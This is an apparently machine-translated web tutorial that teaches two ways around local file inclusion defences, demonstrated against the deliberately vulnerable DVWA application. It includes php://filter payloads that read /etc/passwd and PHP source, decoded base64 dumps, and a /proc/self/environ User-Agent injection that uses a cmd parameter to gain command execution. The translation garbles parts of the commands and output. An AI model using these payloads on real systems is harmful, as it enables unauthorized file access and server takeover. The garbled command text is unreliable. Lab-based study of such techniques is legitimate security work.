قالب وردپرس درنا توس
Home / Tips and Tricks / Overcoming LFI Limitations with Advanced Techniques «Null Byte :: WonderHowTo

Overcoming LFI Limitations with Advanced Techniques «Null Byte :: WonderHowTo



One of the most common security vulnerabilities in Web applications is LFI, which allows unauthorized access to sensitive files on the server. Such common weakness is often prevented, and low-hanging fruit can be easily defended. However, there are always creative ways to get around these defenses, and we'll explore two methods to beat the system and successfully complete LFI.

Local File Inclusion (LFI) is a technique that allows an attacker to access files on the system that otherwise could not be displayed. This is usually done through a vulnerable Web application that accesses files outside the Web document root using a variety of methods.

With the exception of the worst-written web applications, LFI is generally not as straightforward as just requesting the desired file. However, there are techniques to circumvent these limitations, e.g. For example, the PHP filter method and the / proc / self / environ method. To test this, we use DVWA (Damn Vulnerable Web Application) as the target and Kali Linux as the attack engine.

Method 1
: PHP Filter Wrapper

First log in to DVWA with the default credentials that are admin and password .

Next, go to the DVWA Security page. Set the security level to Low in the drop-down list and click Submit.

Finally, switch to the "Include Files" page, which is vulnerable to LFI.

The most basic type of LFI is the point-point slash technique, where the vulnerable parameter is replaced by periods and slashes (to scale the directories) reach the desired target file. Below is a typical LFI that accesses the file / etc / passwd .

In most cases, we are not lucky, and there are security measures to prevent this type of attack. However, we can often work around these limitations by cleverly using PHP's filter wrapper.

PHP has a number of wrappers that provide access to input and output streams and manipulate read or written data. One of these wrappers is the filter wrapper, which allows PHP's filter functions to access a stream after opening.

One of the filter wrapper parameter options is the ability to encode a resource in base64. We can use this to our advantage to display files that are blocked in more limited environments. For example, to display the / etc / passwd file, place this code in the page parameter:

  php: //filter/convert.base64-encode/resource=/etc/passwd 

When we load the page, we see a long string of Base64 encoded data.

Now we just have to decode them to display the content. We can either use an online Base64 decoder or simply play the string in the terminal and guide him with the flag -d for decoding by [19659016] ~ # echo 2Q6L2Jpbi9zaApnbmF0czp4OjQxOjQxOkduYXRzIEJ1Zy1SZXBvcnRpbmcgU3lzdGVtIChhZG1pbik6L3Zhci9saWIvZ25hdHM6L2Jpbi9zaApub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi9iaW4vc2gKbGlidXVpZDp4OjEwMDoxMDE6Oi92YXIvbGliL2xpYnV1aWQ6L2Jpbi9zaApkaGNwOng6MTAxOjEwMjo6L25vbmV4aXN0ZW50Oi9iaW4vZmFsc2UKc3lzbG9nOng6MTAyOjEwMzo6L2hvbWUvc3lzbG9nOi9iaW4vZmFsc2UKa2xvZzp4OjEwMzoxMDQ6Oi9ob21lL2tsb2c6L2Jpbi9mYWxzZQpzc2hkOng6MTA0OjY1NTM0OjovdmFyL3J1bi9zc2hkOi91c3Ivc2Jpbi9ub2xvZ2luCm1zZmFkbWluOng6MTAwMDoxMDAwOm1zZmFkbWluLCwsOi9ob21lL21zZmFkbWluOi9iaW4vYmFzaApiaW5kOng6MTA1OjExMzo6L3Zhci9jYWNoZS9iaW5kOi9iaW4vZmFsc2UKcG9zdGZpeDp4OjEwNjoxMTU6Oi92YXIvc3Bvb2wvcG9zdGZpeDovYmluL2ZhbHNlCmZ0cDp4OjEwNzo2NTUzNDo6L2hvbWUvZnRwOi9iaW4vZmFsc2UKcG9zdGdyZXM6eDoxMDg6MTE3OlBvc3RncmVTUUwgYWRtaW5pc3RyYXR vciwsLDovdmFyL2xpYi9wb3N0Z3Jlc3FsOi9iaW4vYmFzaApteXNxbDp4OjEwOToxMTg6TXlTUUwgU2VydmVyLCwsOi92YXIvbGliL215c3FsOi9iaW4vZmFsc2UKdG9tY2F0NTU6eDoxMTA6NjU1MzQ6Oi91c3Ivc2hhcmUvdG9tY2F0NS41Oi9iaW4vZmFsc2UKZGlzdGNjZDp4OjExMTo2NTUzNDo6LzovYmluL 2ZhbHNlCnVzZXI6eDoxMDAxOjEwMDE6anVzdCBhIHVzZXIsMTExLCw6L2hvbWUvdXNlcjovYmluL2Jhc2gKc2VydmljZTp4OjEwMDI6MTAwMjosLCw6L2hvbWUvc2VydmljZTovYmluL2Jhc2gKdGVsbmV0ZDp4OjExMjoxMjA6Oi9ub25leGlzdGVudDovYmluL2ZhbHNlCnByb2Z0cGQ6eDoxMTM6NjU1MzQ6Oi92YXIvcnVuL3Byb2Z0cGQ6L2Jpbi9mYWxzZQpzdGF0ZDp4OjExNDo2NTUzNDo6L3Zhci9saWIvbmZzOi9iaW4vZmFsc2UK | base64 -d

And now we can see the contents of / etc / passwd:

  root: x: 0: 0: root: / root: / bin / bash
Daemon: x: 1: 1: daemon: / usr / sbin: / bin / sh
bin: x: 2: 2: bin: / bin: / bin / sh
sys: x: 3: 3: sys: / dev: / bin / sh
sync: x: 4: 65534: sync: / bin: / bin / sync
Games: x: 5: 60: Games: / usr / Games: / bin / sh
man: x: 6: 12: man: / var / cache / man: / bin / sh
lp: x: 7: 7: lp: / var / spool / lpd: / bin / sh
mail: x: 8: 8: mail: / var / mail: / bin / sh
news: x: 9: 9: news: / var / spool / news: / bin / sh
uucp: x: 10: 10: uucp: / var / spool / uucp: / bin / sh
Proxy: x: 13: 13: Proxy: / bin: / bin / sh
www-data: x: 33: 33: www-data: / var / www: / bin / sh
backup: x: 34: 34: backup: / var / backups: / bin / sh
list: x: 38: 38: mailing list manager: / var / list: / bin / sh
irc: x: 39: 39: ircd: / var / run / ircd: / bin / sh
gnats: x: 41: 41: midges bug reporting system (admin): / var / lib / gnats: / bin / sh
nobody: x: 65534: 65534: nobody: / ​​nonexistent: / bin / sh
libuuid: x: 100: 101 :: / var / lib / libuuid: / bin / sh
dhcp: x: 101: 102 :: / absent: / bin / false
syslog: x: 102: 103 :: / home / syslog: / bin / false
klog: x: 103: 104 :: / home / klog: / bin / false
sshd: x: 104: 65534 :: / var / run / sshd: / usr / sbin / nologin
msfadmin: x: 1000: 1000: msfdmin ,,,: / home / msfadmin: / bin / bash
bind: x: 105: 113 :: / var / cache / bind: / bin / false
postfix: x: 106: 115 :: / var / spool / postfix: / bin / false
ftp: x: 107: 65534 :: / home / ftp: / bin / false
postgres: x: 108: 117: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash
mysql: x: 109: 118: mysql server ,,,: / var / lib / mysql: / bin / false
tomcat55: x: 110: 65534 :: / usr / share / tomcat5.5: / bin / false
distccd: x: 111: 65534 :: /: / bin / false
user: x: 1001: 1001: only one user, 111 ,,: / home / user: / bin / bash
service: x: 1002: 1002: ,,,: / home / service: / bin / bash
telnetd: x: 112: 120 :: / not available: / bin / false
proftpd: x: 113: 65534 :: / var / run / proftpd: / bin / false
statd: x: 114: 65534 :: / var / lib / nfs: / bin / false 

The filter wrapper also includes a ROT13 encryption feature that rotates each letter thirteen places. We can also use this to work around certain limitations and display files. Here is the code:

  php: //filter/read=string.rot13/resource=/etc/passwd 

When the page loads, we can see above what looks like a mess.

Copy this data and enter it into a ROT13 decoder to retrieve the contents of our file.

The filter wrapper can sometimes be used as a bypass by simply specifying the desired resource without requiring coding. Like this:

  php: // filter / resource = / etc / passwd 

This may still give us the contents of / etc / passwd. [19659032[WiemanLFIConstraintsWithAdvancedTechniquesDefeated” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>

This wrapper is not just for the Viewing system files is useful, but can also be used to read the source code of PHP files. For example, we can show the source code of include.php with the following line:

  php: //filter/convert.base64-encode/resource=include.php 

Again, we get a base64 encoding string.

And we can decode it the same procedure we did earlier.

  ~ # echo PD9waHANCg0KJHBhZ2VbICdib2R5JyBdIC49ICINCjxkaXYgY2xhc3M9XCJib2R5X3BhZGRlZFwiPg0KCTxoMT5WdWxuZXJhYmlsaXR5OiBGaWxlIEluY2x1c2lvbjwvaDE + DQoNCgk8ZGl2IGNsYXNzPVwidnVsbmVyYWJsZV9jb2RlX2FyZWFcIj4NCg0KCQlUbyBpbmNsdWRlIGEgZmlsZSBlZGl0IHRoZSA / cGFnZT1pbmRleC5waHAgaW4gdGhlIFVSTCB0byBkZXRlcm1pbmUgd2hpY2ggZmlsZSBpcyBpbmNsdWRlZC4NCg0KCTwvZGl2Pg0KDQoJPGgyPk1vcmUgaW5mbzwvaDI + + DQoJPHVsPg0KCQk8bGk Ii5kdndhRXh0ZXJuYWxMaW5rVXJsR2V0KCAnaHR0cDovL2VuLndpa2lwZWRpYS5vcmcvd2lraS9SZW1vdGVfRmlsZV9JbmNsdXNpb24nKS4iPC9saT4NCgkJPGxpPiIuZHZ3YUV4dGVybmFsTGlua1VybEdldCggJ2h0dHA6Ly93d3cub3dhc3Aub3JnL2luZGV4LnBocC9Ub3BfMTBfMjAwNy1BMycpLiI8L2xpPg0KCTwvdWw + 8 + DQo8L2Rpdj4NCiI7DQoNCj DQO = | base64 -d 

Now we can display the source code of the page in plain text:

  <? php

$ page ['body'].

Vulnerability: Inclusion of files

To include a file, edit the file? Page = index.php in the URL to determine which file is included.

"DvwaExternalLinkUrlGet (& # 39; http: //en.wikipedia.org/wiki/Remote_File_Inclusion&#39;)."
  • ". DvwaExternalLinkUrlGet (& # 39; http: //www.owasp.org/index.php/Top_10_2007-A3 & # 39;)."
  • "; ?>

    This method is especially useful if there is a feature on the page that could potentially be misused for shell access or escalation of permissions.

    Method 2: / Proc / Self / Environ Command Execution

    Another LFI technique For environments with more limited rights, the file / proc / self / environ can be used on Linux systems. The file contains environment variables. If we can access it as a non-root user (like WWW data common to web servers), we can use it to get a shell. You can access it by inserting it as a page parameter.

      / proc / self / environ 

    Some information about the environment is displayed on the page.

    While This may be useful for the Enlightenment. What we are really looking for is command execution. This is done by inserting PHP code into the user agent variable that executes when the page loads on the server.

    The easiest way to do this is to use a proxy like Burp Suite. Start Burp, make sure Intercept is turned on, and load the page as / proc / self / environ as before. We should see Burp's request as such:

    There are two things we need to change here. First enter this PHP code in the User-Agent field.

       

    This calls the system on the server and executes the command, which we pass to the parameter "cmd". Next, add the command you want to the page parameter as follows:

      page = / proc / self / environ & cmd = id 

    The final request should look like this:

    Summary

    Today we have received information about local file inclusion, usage for accessing system files, and advanced techniques in locked environments. First, we looked at PHP's filter wrapper and discussed how it can be used to encode and read files and source code. Then we examined / proc / self / environ LFI and how it can be used to get a shell on the target. This is just to show that sometimes even a (seemingly) simple vulnerability such as LFI can lead to complete system takeover.

    Title image of Myrfa / Pixabay; Screenshots of drd_ / zero byte

    Source link